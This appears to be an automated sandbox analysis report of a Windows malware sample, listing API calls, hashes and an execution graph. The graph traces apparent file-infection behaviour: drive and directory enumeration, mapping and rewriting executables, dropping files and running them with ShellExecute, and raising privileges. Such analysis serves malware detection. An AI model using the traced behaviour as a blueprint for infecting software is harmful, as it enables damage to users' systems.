                                • Part of subcall function 004022A8: __decode_pointer.LIBCMT ref: 00402342
                                • Part of subcall function 004022A8: __decode_pointer.LIBCMT ref: 0040234F
                                • Part of subcall function 004022A8: __initterm.LIBCMT ref: 0040237E
                                • Part of subcall function 004022A8: __initterm.LIBCMT ref: 0040238E
                              Memory Dump Source
                              • Source File: 00000000.00000002.2022705205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2022671348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2022728846.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2022751942.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2022776305.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2022803690.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_yRc7UfFif9.jbxd
                              Similarity
                              • API ID: __decode_pointer$__initterm$__lock_doexit
                              • String ID:
                              • API String ID: 1597249276-0
                              • Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                              • Instruction ID: 56d6ec75f9ca001e469de65b509690461a690c23f8048b21a9ddfe31d5bb7ce0
                              • Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                              • Instruction Fuzzy Hash: D5B0927258020833EA202582AC07F063B1987C0B64E240066BA0C295E1A9A6A961808A
                              APIs
                              • IsDebuggerPresent.KERNEL32 ref: 00404454
                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00404469
                              • UnhandledExceptionFilter.KERNEL32(0040E2D4), ref: 00404474
                              • GetCurrentProcess.KERNEL32(C0000409), ref: 00404490
                              • TerminateProcess.KERNEL32(00000000), ref: 00404497
                              Memory Dump Source
                              • Source File: 00000000.00000002.2022705205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2022671348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2022728846.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2022751942.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2022776305.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2022803690.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_yRc7UfFif9.jbxd
                              Similarity
                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                              • String ID:
                              • API String ID: 2579439406-0
                              • Opcode ID: 23da0d9ffc51f7e3674ec70a0344f5b5beb142691558593c3537b45a2856aa59
                              • Instruction ID: a2c1d01f0a8fc7b860fa4c5ba8dee9755c81e3f17099ada6bc54c17834eb60e6
                              • Opcode Fuzzy Hash: 23da0d9ffc51f7e3674ec70a0344f5b5beb142691558593c3537b45a2856aa59
                              • Instruction Fuzzy Hash: 3E21FEB4401210EFD740DF65FA856893BB4FB48300F1184BAEA08E76B0E3F859A48F1D
                              APIs
                              • SetUnhandledExceptionFilter.KERNEL32(Function_00005FBE), ref: 00406005
                              Memory Dump Source
                              • Source File: 00000000.00000002.2022705205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2022671348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2022728846.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2022751942.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2022776305.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2022803690.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_yRc7UfFif9.jbxd
                              Similarity
                              • API ID: ExceptionFilterUnhandled
                              • String ID:
                              • API String ID: 3192549508-0
                              • Opcode ID: 03e2138c96defe5f6c4322f41c97ea28f6cc5d0ca766cf02e782f863edac97cf
                              • Instruction ID: 276ab158461ab0854dff8c4ba172e82da5abdd5be2fa13cd776f410961e88b47
                              • Opcode Fuzzy Hash: 03e2138c96defe5f6c4322f41c97ea28f6cc5d0ca766cf02e782f863edac97cf
                              • Instruction Fuzzy Hash: 7890026125252196D60027715E0968776D49A5960676109716212E4094DABC8054991A
                              Memory Dump Source
                              • Source File: 00000000.00000002.2022803690.0000000000415000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2022671348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2022705205.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2022728846.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2022751942.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2022776305.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_yRc7UfFif9.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1dc641a110ca9df19878faaf737841f865a9904d38a7bb4b8f4adfe9b60eb3df
                              • Instruction ID: 7b357e6e517895dbe12adbe9a7f777a7b357507db5a8af5602780b1ce824b875
                              • Opcode Fuzzy Hash: 1dc641a110ca9df19878faaf737841f865a9904d38a7bb4b8f4adfe9b60eb3df
                              • Instruction Fuzzy Hash: 79819531608B458FC714DF29D8906EAB7E2EFD6314F14892ED0EA87751D738A889CB49

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 735 4010a0-4010ca 736 4010cc 735->736 737 4010df-401107 call 401e96 735->737 738 4010d0-4010d3 736->738 743 4011b1-4011cb call 401a9b call 401b60 737->743 744 40110d-401112 737->744 740 4010d5 738->740 741 4010d9-4010dd 738->741 740->741 741->737 741->738 754 4011ce-4011e6 call 401ee2 743->754 744->743 745 401118-40113f call 401e96 744->745 751 401142-401147 745->751 751->751 753 401149-401154 751->753 755 401160-401166 753->755 756 401156-40115a 753->756 758 401171-4011af call 401c84 call 401a9b call 401b60 755->758 761 401168-40116f 755->761 756->758 759 40115c 756->759 758->754 759->755 761->755 761->758
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2022705205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2022671348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2022728846.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2022751942.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2022776305.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2022803690.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_yRc7UfFif9.jbxd
                              Similarity
                              • API ID: __wsplitpath_calloc_strncpy$__wmakepath
                              • String ID: \$\
                              • API String ID: 550690-164819647
                              • Opcode ID: 6b08398ac8986faab224cc4e25f628c45a334c78e1b91678b68513e9d93174b4
                              • Instruction ID: ff4e68a8fe18fc9b97d4bba43c3c323c9ca1ce8c53413bd27601e723a30b8d8d
                              • Opcode Fuzzy Hash: 6b08398ac8986faab224cc4e25f628c45a334c78e1b91678b68513e9d93174b4
                              • Instruction Fuzzy Hash: 9F316CB1404380AED325DB10CC81FEBB3E8AF89704F04496EF7C567191E378994887AB
                              APIs
                              • _memset.LIBCMT ref: 00401375
                              • SetConsoleCtrlHandler.KERNEL32 ref: 0040138C
                              • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000000,00000000,00000000,?,00000001), ref: 004013AF
                              • _fprintf.LIBCMT ref: 004013C7
                              • WaitForSingleObject.KERNEL32(00000001,000000FF), ref: 004013E6
                              • GetExitCodeProcess.KERNEL32(00000001,00000000), ref: 004013F5
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2022705205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2022671348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2022728846.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2022751942.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2022776305.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2022803690.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_yRc7UfFif9.jbxd
                              Similarity
                              • API ID: Process$CodeConsoleCreateCtrlExitHandlerObjectSingleWait_fprintf_memset
                              • String ID: D$failed to create process.$failed to get exit code from process.
                              • API String ID: 1493708761-2047806753
                              • Opcode ID: d0de34054ce82bd43d2fe410723fc00cfad17156a394d383c3c61f2657a6dedf
                              • Instruction ID: 34a530c21fcf4aab6bb134418fb42986268233c3b95e978881f8daa222adcb36
                              • Opcode Fuzzy Hash: d0de34054ce82bd43d2fe410723fc00cfad17156a394d383c3c61f2657a6dedf
                              • Instruction Fuzzy Hash: D31191B0648301AFE310EF65CD46F1B77E8AB84B04F108D2DF659E62D0E6B8D5188B5A
                              APIs
                              • __getptd.LIBCMT ref: 004046D1
                                • Part of subcall function 0040516E: __getptd_noexit.LIBCMT ref: 00405171
                                • Part of subcall function 0040516E: __amsg_exit.LIBCMT ref: 0040517E
                              • __amsg_exit.LIBCMT ref: 004046F1
                              • __lock.LIBCMT ref: 00404701
                              • InterlockedDecrement.KERNEL32(?), ref: 0040471E
                              • InterlockedIncrement.KERNEL32(00711670), ref: 00404749
                              Memory Dump Source
                              • Source File: 00000000.00000002.2022705205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2022671348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2022728846.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2022751942.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2022776305.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2022803690.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_yRc7UfFif9.jbxd
                              Similarity
                              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                              • String ID:
                              • API String ID: 4271482742-0
                              • Opcode ID: bfb2d015a437bf2f75142ed56999e104d6438876da5dba3a6470cb0087768ea4
                              • Instruction ID: 762af939121588747dd0ca135b41566db6ae5fc7b386992e2f1cba590a1bc26f
                              • Opcode Fuzzy Hash: bfb2d015a437bf2f75142ed56999e104d6438876da5dba3a6470cb0087768ea4
                              • Instruction Fuzzy Hash: EE01EDB1901621ABC720AF2698067AE7664BB41755F04813BEA60772D0CB3C6D01CFDD
                              APIs
                              • __lock.LIBCMT ref: 00403ADB
                                • Part of subcall function 00403EF9: __mtinitlocknum.LIBCMT ref: 00403F0F
                                • Part of subcall function 00403EF9: __amsg_exit.LIBCMT ref: 00403F1B
                                • Part of subcall function 00403EF9: EnterCriticalSection.KERNEL32(?,?,?,004019E7,?), ref: 00403F23
                              • ___sbh_find_block.LIBCMT ref: 00403AE6
                              • ___sbh_free_block.LIBCMT ref: 00403AF5
                              • HeapFree.KERNEL32(00000000,?,0040F578,0000000C,0040515F,00000000,?,0040399D,?,00000001,?,?,00403E83,00000018,0040F5E0,0000000C), ref: 00403B25
                              • GetLastError.KERNEL32(?,0040399D,?,00000001,?,?,00403E83,00000018,0040F5E0,0000000C,00403F14,?,?,?,004019E7,?), ref: 00403B36
                              Memory Dump Source
                              • Source File: 00000000.00000002.2022705205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2022671348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2022728846.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2022751942.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2022776305.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2022803690.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_yRc7UfFif9.jbxd
                              Similarity
                              • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                              • String ID:
                              • API String ID: 2714421763-0
                              • Opcode ID: a12cb5a377b960506db2246119b09161ccaed8dd57b3f76921e50dc72fc51c3a
                              • Instruction ID: 0fc8657c13906ab74fcdd902c6ebe0ed0f7107b6a60225d746b313d4028bb8d5
                              • Opcode Fuzzy Hash: a12cb5a377b960506db2246119b09161ccaed8dd57b3f76921e50dc72fc51c3a
                              • Instruction Fuzzy Hash: 64015EB1941305AADA306FA2980AB5B7E689B0072AF10853FF104B61C2CA7C9A408A5C
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2022705205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2022671348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2022728846.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2022751942.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2022776305.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2022803690.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_yRc7UfFif9.jbxd
                              Similarity
                              • API ID: _sprintf$_calloc
                              • String ID: %s
                              • API String ID: 1847391153-3874713491
                              • Opcode ID: 506ba3259ec5662ead1a3bac2a13b86467e90f765512d11c77d13c91b1884411
                              • Instruction ID: 3e0aaedb16861467738b36e15ffebac14c8137eedcf37fbcf32618918a6528ec
                              • Opcode Fuzzy Hash: 506ba3259ec5662ead1a3bac2a13b86467e90f765512d11c77d13c91b1884411
                              • Instruction Fuzzy Hash: B72138312042025FC311CF1CC494EE6B3E69F86348F15456AF885EB2B2DA76E90E87D5
                              APIs
                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0040A318
                              • __isleadbyte_l.LIBCMT ref: 0040A34C
                              • MultiByteToWideChar.KERNEL32(?,00000009,?,?,?,00000000,?,?,?,00000000,?,?,00000000), ref: 0040A37D
                              • MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,?,00000000,?,?,?,00000000,?,?,00000000), ref: 0040A3EB
                              Memory Dump Source
                              • Source File: 00000000.00000002.2022705205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2022671348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2022728846.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2022751942.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2022776305.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2022803690.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_yRc7UfFif9.jbxd
                              Similarity
                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                              • String ID:
                              • API String ID: 3058430110-0
                              • Opcode ID: 4f57c0c18d61a66ad97d6be7dec4c5e608a13d2facb429ccd72208ac479570c4
                              • Instruction ID: ecb9902cf17e40a010e2e2b1b54a430317f3bb45ddcf6aa4964fa5cd43223a8d
                              • Opcode Fuzzy Hash: 4f57c0c18d61a66ad97d6be7dec4c5e608a13d2facb429ccd72208ac479570c4
                              • Instruction Fuzzy Hash: C531D031A00346EFDB20DF64C8949AE3BA5FF01310B1589BAE861AB2D1D734DD60DB5A
                              APIs
                              • __getptd.LIBCMT ref: 00404E3D
                                • Part of subcall function 0040516E: __getptd_noexit.LIBCMT ref: 00405171
                                • Part of subcall function 0040516E: __amsg_exit.LIBCMT ref: 0040517E
                              • __getptd.LIBCMT ref: 00404E54
                              • __amsg_exit.LIBCMT ref: 00404E62
                              • __lock.LIBCMT ref: 00404E72
                              Memory Dump Source
                              • Source File: 00000000.00000002.2022705205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2022671348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2022728846.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2022751942.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2022776305.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2022803690.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_yRc7UfFif9.jbxd
                              Similarity
                              • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                              • String ID:
                              • API String ID: 3521780317-0
                              • Opcode ID: 3dcc82b5a170c8cf9336be6d49bee876bb3b912368579d21efbebef048838667
                              • Instruction ID: 09d2f9d651c6c409bc02885c121a8a6903a39f7021fc6d6957eb733fdf563978
                              • Opcode Fuzzy Hash: 3dcc82b5a170c8cf9336be6d49bee876bb3b912368579d21efbebef048838667
                              • Instruction Fuzzy Hash: ADF062B69407008AD630BB75D80674F76907F40725F15823FF6407B2D2CB7C5901CA99

                              Execution Graph

                              Execution Coverage:28.9%
                              Dynamic/Decrypted Code Coverage:8.9%
                              Signature Coverage:19.2%
                              Total number of Nodes:292
                              Total number of Limit Nodes:11
                              execution_graph 1006 c56076 1007 c5607b 1006->1007 1011 c560c7 1006->1011 1009 c560b0 VirtualAlloc 1007->1009 1007->1011 1018 c561b2 1007->1018 1008 c5615f VirtualFree 1008->1011 1009->1011 1010 c56198 VirtualFree 1010->1018 1011->1008 1011->1010 1012 c560d5 VirtualAlloc 1011->1012 1012->1011 1013 c56389 VirtualProtect 1016 c563b7 1013->1016 1014 c563fc VirtualProtect 1015 c56418 1014->1015 1016->1014 1017 c563e7 VirtualProtect 1016->1017 1017->1014 1017->1016 1018->1013 1019 c562fb 1018->1019 1020 c514e1 1021 c51541 1020->1021 1022 c514fd GetModuleHandleA 1020->1022 1024 c51573 1021->1024 1027 c51549 1021->1027 1023 c5151a VirtualQuery 1022->1023 1026 c51512 1022->1026 1023->1026 1031 c51638 GetTempPathA GetSystemDirectoryA GetModuleFileNameA 1024->1031 1026->1021 1028 c51566 1027->1028 1048 c51af9 1027->1048 1029 c51579 ExitProcess 1032 c5167f 1031->1032 1033 c5167a 1031->1033 1054 c51718 GetSystemTimeAsFileTime 1032->1054 1066 c5139f GetVersionExA 1033->1066 1036 c51686 1037 c516ca 1036->1037 1040 c516a0 CreateThread 1036->1040 1038 c516d7 1037->1038 1039 c516d0 1037->1039 1042 c516dd lstrcpy 1038->1042 1043 c5170f 1038->1043 1087 c51581 1039->1087 1059 c52c48 memset 1040->1059 1303 c51099 1040->1303 1042->1029 1043->1029 1047 c51718 3 API calls 1047->1037 1049 c51b11 1048->1049 1050 c51b09 1048->1050 1052 c51b16 CreateThread 1049->1052 1053 c51b0f 1049->1053 1051 c51638 188 API calls 1050->1051 1051->1053 1052->1053 1322 c51638 189 API calls 1052->1322 1053->1028 1053->1053 1055 c51735 SHSetValueA 1054->1055 1056 c51754 1054->1056 1058 c51786 __aulldiv 1055->1058 1057 c5175a SHGetValueA 1056->1057 1056->1058 1057->1058 1058->1036 1093 c51973 PathFileExistsA 1059->1093 1062 c52cb2 1064 c516ba WaitForSingleObject 1062->1064 1065 c52cbb VirtualFree 1062->1065 1063 c52c8f CreateThread WaitForMultipleObjects 1063->1062 1115 c52b8c memset GetLogicalDriveStringsA 1063->1115 1064->1047 1065->1064 1067 c513cf LookupPrivilegeValueA 1066->1067 1068 c514da 1066->1068 1069 c513e7 1067->1069 1070 c513ef 1067->1070 1068->1032 1283 c5119f GetCurrentProcess OpenProcessToken 1069->1283 1070->1068 1288 c5120e GetModuleHandleA GetProcAddress 1070->1288 1076 c51448 GetCurrentProcessId 1076->1068 1077 c51457 1076->1077 1077->1068 1078 c51319 3 API calls 1077->1078 1079 c5147f 1078->1079 1080 c51319 3 API calls 1079->1080 1081 c5148e 1080->1081 1081->1068 1082 c51319 3 API calls 1081->1082 1083 c514b4 1082->1083 1084 c51319 3 API calls 1083->1084 1085 c514c3 1084->1085 1086 c51319 3 API calls 1085->1086 1086->1068 1302 c5185b GetSystemTimeAsFileTime srand rand srand rand 1087->1302 1089 c51592 wsprintfA wsprintfA lstrlen CreateFileA 1090 c51633 1089->1090 1091 c515fb WriteFile CloseHandle 1089->1091 1090->1043 1091->1090 1092 c5161d ShellExecuteA 1091->1092 1092->1090 1094 c519a0 1093->1094 1110 c51ac7 1093->1110 1095 c519af CreateFileA 1094->1095 1096 c519c4 Sleep 1095->1096 1097 c51a28 GetFileSize 1095->1097 1096->1095 1098 c519d5 1096->1098 1099 c51a80 1097->1099 1100 c51a38 1097->1100 1114 c5185b GetSystemTimeAsFileTime srand rand srand rand 1098->1114 1103 c51a96 1099->1103 1104 c51a8d CloseHandle 1099->1104 1100->1099 1102 c51a3d VirtualAlloc 1100->1102 1102->1099 1106 c51a53 1102->1106 1107 c51aad 1103->1107 1108 c51a9c DeleteFileA 1103->1108 1104->1103 1105 c519da wsprintfA CopyFileA 1105->1097 1111 c51a0d CreateFileA 1105->1111 1106->1099 1112 c51a59 ReadFile 1106->1112 1107->1110 1113 c51ab8 VirtualFree 1107->1113 1108->1107 1110->1062 1110->1063 1111->1097 1111->1108 1112->1099 1112->1106 1113->1110 1114->1105 1116 c52c09 WaitForMultipleObjects 1115->1116 1117 c52bc8 1115->1117 1118 c52c3c 1116->1118 1119 c52c2a CreateThread 1116->1119 1120 c52bfa lstrlen 1117->1120 1121 c52bd2 GetDriveTypeA 1117->1121 1122 c52be3 CreateThread 1117->1122 1119->1118 1126 c52845 1119->1126 1120->1116 1120->1117 1121->1117 1121->1120 1122->1120 1123 c52b7d 1122->1123 1136 c529e2 memset wsprintfA 1123->1136 1273 c5274a memset memset SHGetSpecialFolderPathA wsprintfA 1126->1273 1128 c52878 DeleteFileA 1129 c5288c VirtualFree 1128->1129 1130 c5289a 1128->1130 1129->1130 1132 c528a4 CloseHandle 1130->1132 1133 c528ab 1130->1133 1131 c52692 8 API calls 1134 c52853 1131->1134 1132->1133 1134->1128 1134->1131 1135 c5239d 186 API calls 1134->1135 1135->1134 1137 c52abc memset memset FindFirstFileA 1136->1137 1138 c52a3a memset lstrlen lstrcpyn strrchr 1136->1138 1150 c528b8 memset wsprintfA 1137->1150 1138->1137 1139 c52a88 1138->1139 1139->1137 1141 c52a9a lstrcmpiA 1139->1141 1143 c52b74 1141->1143 1144 c52aad lstrlen 1141->1144 1144->1137 1144->1141 1145 c52b61 FindNextFileA 1146 c52b23 1145->1146 1147 c52b6d FindClose 1145->1147 1148 c528b8 174 API calls 1146->1148 1149 c52b35 lstrcmpiA 1146->1149 1147->1143 1148->1145 1149->1146 1149->1147 1151 c52905 1150->1151 1161 c52951 memset 1150->1161 1152 c52956 strrchr 1151->1152 1153 c5291b memset wsprintfA 1151->1153 1151->1161 1155 c52967 lstrcmpiA 1152->1155 1152->1161 1154 c529e2 180 API calls 1153->1154 1154->1161 1156 c52988 lstrcmpiA 1155->1156 1157 c5297a 1155->1157 1158 c52994 1156->1158 1156->1161 1168 c51e6e 1157->1168 1160 c529ad strstr 1158->1160 1162 c529a5 lstrcpy 1158->1162 1163 c529d3 1160->1163 1164 c529cb 1160->1164 1161->1145 1162->1160 1233 c52692 1163->1233 1211 c5239d strstr 1164->1211 1169 c51e7d 1168->1169 1242 c51df6 strrchr 1169->1242 1172 c51eb0 SetFileAttributesA CreateFileA 1173 c52332 1172->1173 1174 c51edf 1172->1174 1175 c52346 1173->1175 1176 c5233d UnmapViewOfFile 1173->1176 1247 c51915 1174->1247 1178 c52350 1175->1178 1179 c5234b CloseHandle 1175->1179 1176->1175 1181 c52356 CloseHandle 1178->1181 1182 c52391 1178->1182 1179->1178 1181->1182 1182->1161 1183 c51f2e 1183->1173 1253 c51c81 1183->1253 1187 c51f92 1188 c51c81 2 API calls 1187->1188 1189 c51f9f 1188->1189 1189->1173 1190 c51af9 169 API calls 1189->1190 1192 c52024 1189->1192 1195 c51fc0 1190->1195 1191 c51af9 169 API calls 1193 c5207a 1191->1193 1192->1173 1192->1191 1194 c51af9 169 API calls 1193->1194 1199 c52090 1194->1199 1195->1173 1195->1192 1196 c51af9 169 API calls 1195->1196 1197 c51ffe 1196->1197 1198 c52013 FlushViewOfFile 1197->1198 1198->1192 1200 c520bb memset memset 1199->1200 1201 c520f5 1200->1201 1202 c51c81 2 API calls 1201->1202 1204 c521de 1202->1204 1203 c52226 memcpy UnmapViewOfFile CloseHandle 1258 c51b8a 1203->1258 1204->1203 1206 c5226e 1266 c5185b GetSystemTimeAsFileTime srand rand srand rand 1206->1266 1208 c522ab SetFilePointer SetEndOfFile SetFilePointer WriteFile WriteFile 1209 c51915 3 API calls 1208->1209 1210 c5231f CloseHandle 1209->1210 1210->1173 1212 c52451 CreateFileA GetFileSize 1211->1212 1220 c523d8 1211->1220 1213 c52675 CloseHandle 1212->1213 1214 c52480 1212->1214 1215 c5267c RemoveDirectoryA 1213->1215 1214->1213 1217 c52499 1214->1217 1216 c52687 1215->1216 1216->1161 1218 c51915 3 API calls 1217->1218 1219 c524a4 9 API calls 1218->1219 1268 c5189d memset CreateProcessA 1219->1268 1220->1212 1220->1216 1223 c5255c Sleep memset wsprintfA 1224 c529e2 163 API calls 1223->1224 1225 c52597 memset wsprintfA Sleep 1224->1225 1226 c5189d 6 API calls 1225->1226 1227 c525e4 Sleep CreateFileA 1226->1227 1228 c51915 3 API calls 1227->1228 1229 c52610 CloseHandle 1228->1229 1229->1215 1230 c5261e 1229->1230 1230->1215 1231 c52641 SetFilePointer WriteFile 1230->1231 1231->1215 1232 c52667 SetEndOfFile 1231->1232 1232->1215 1234 c526b2 WaitForSingleObject 1233->1234 1235 c526a2 CreateEventA 1233->1235 1236 c526c1 lstrlen ??2@YAPAXI 1234->1236 1237 c52708 1234->1237 1235->1234 1238 c52736 SetEvent 1236->1238 1239 c526da lstrcpy 1236->1239 1237->1238 1241 c52718 lstrcpy ??3@YAXPAX 1237->1241 1238->1161 1240 c526f1 1239->1240 1240->1238 1241->1240 1243 c51e13 lstrcpy strrchr 1242->1243 1244 c51e62 1242->1244 1243->1244 1245 c51e40 lstrcmpiA 1243->1245 1244->1172 1244->1173 1245->1244 1246 c51e52 lstrlen 1245->1246 1246->1244 1246->1245 1248 c51928 1247->1248 1252 c51924 SetFilePointer CreateFileMappingA MapViewOfFile 1247->1252 1249 c5194f 1248->1249 1250 c5192e memset GetFileTime 1248->1250 1251 c51954 SetFileTime 1249->1251 1249->1252 1250->1252 1251->1252 1252->1173 1252->1183 1254 c51c94 1253->1254 1255 c51c9c 1253->1255 1254->1173 1257 c5185b GetSystemTimeAsFileTime srand rand srand rand 1254->1257 1255->1254 1256 c51cae memset memset 1255->1256 1256->1254 1257->1187 1259 c51b93 1258->1259 1267 c5185b GetSystemTimeAsFileTime srand rand srand rand 1259->1267 1261 c51bca srand 1262 c51bd8 rand 1261->1262 1263 c51c08 1262->1263 1263->1262 1264 c51c29 memset memcpy lstrcat 1263->1264 1264->1206 1266->1208 1267->1261 1269 c518e0 CloseHandle WaitForSingleObject 1268->1269 1270 c5190c 1268->1270 1271 c51907 CloseHandle 1269->1271 1272 c518fb GetExitCodeProcess 1269->1272 1270->1215 1270->1223 1271->1270 1272->1271 1282 c5185b GetSystemTimeAsFileTime srand rand srand rand 1273->1282 1275 c527b5 wsprintfA CopyFileA 1276 c52840 1275->1276 1277 c527de wsprintfA 1275->1277 1276->1134 1278 c51973 17 API calls 1277->1278 1279 c5280f 1278->1279 1280 c52820 CreateFileA 1279->1280 1281 c52813 DeleteFileA 1279->1281 1280->1276 1281->1280 1282->1275 1284 c511c6 AdjustTokenPrivileges 1283->1284 1285 c51200 